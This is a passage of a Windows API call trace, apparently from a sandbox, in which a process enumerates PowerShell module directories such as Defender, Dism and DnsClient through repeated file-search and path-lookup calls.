	[0046.709] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.709] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.709] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.712] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab87c0
	[0046.713] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.713] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.713] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.713] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.714] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.714] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.714] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.714] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.714] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.714] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.714] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.715] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab78c0
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.716] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.717] FindClose (in: hFindFile=0x1505fab78c0 | out: hFindFile=0x1505fab78c0) returned 1
	[0046.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.717] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8640
	[0046.718] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.718] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.718] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.718] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.719] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.719] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.721] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.721] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.721] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.721] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.721] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.721] FindClose (in: hFindFile=0x1505fab8640 | out: hFindFile=0x1505fab8640) returned 1
	[0046.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.723] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50
	[0046.723] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8340
	[0046.724] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.724] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.724] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.724] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.725] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.725] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.725] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.725] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.725] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.725] FindClose (in: hFindFile=0x1505fab8340 | out: hFindFile=0x1505fab8340) returned 1
	[0046.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.726] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50
	[0046.726] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7e00
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.727] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.727] FindClose (in: hFindFile=0x1505fab7e00 | out: hFindFile=0x1505fab7e00) returned 1
	[0046.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.729] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7620
	[0046.729] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.729] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.730] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.730] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.730] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.730] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.730] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.730] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.731] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.731] FindClose (in: hFindFile=0x1505fab7620 | out: hFindFile=0x1505fab7620) returned 1
	[0046.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.735] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8220
	[0046.735] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.735] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.735] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.736] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.736] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.736] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.736] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.736] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.736] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0046.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.737] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.737] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.737] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.737] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.737] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.737] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.737] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.737] FindClose (in: hFindFile=0x1505fab8100 | out: hFindFile=0x1505fab8100) returned 1
	[0046.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.738] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37
	[0046.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.738] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.738] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37
	[0046.738] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38
	[0046.738] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab82e0
	[0046.738] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.738] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.739] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.739] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.739] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.739] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.739] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.739] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.739] FindClose (in: hFindFile=0x1505fab82e0 | out: hFindFile=0x1505fab82e0) returned 1
	[0046.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.739] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1")) returned 0x20
	[0046.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.746] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c
	[0046.746] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d
	[0046.746] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7260
	[0046.755] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.755] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.755] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.755] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.755] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.756] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.757] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.757] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.757] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.757] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.757] FindClose (in: hFindFile=0x1505fab7260 | out: hFindFile=0x1505fab7260) returned 1
	[0046.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.758] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c
	[0046.758] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d
	[0046.758] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8940
	[0046.759] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.759] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.759] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.760] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.760] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.760] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.760] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.760] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.760] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.760] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.761] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.761] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.761] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.761] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.761] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.761] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.761] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.761] FindClose (in: hFindFile=0x1505fab8940 | out: hFindFile=0x1505fab8940) returned 1
	[0046.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.762] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c
	[0046.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
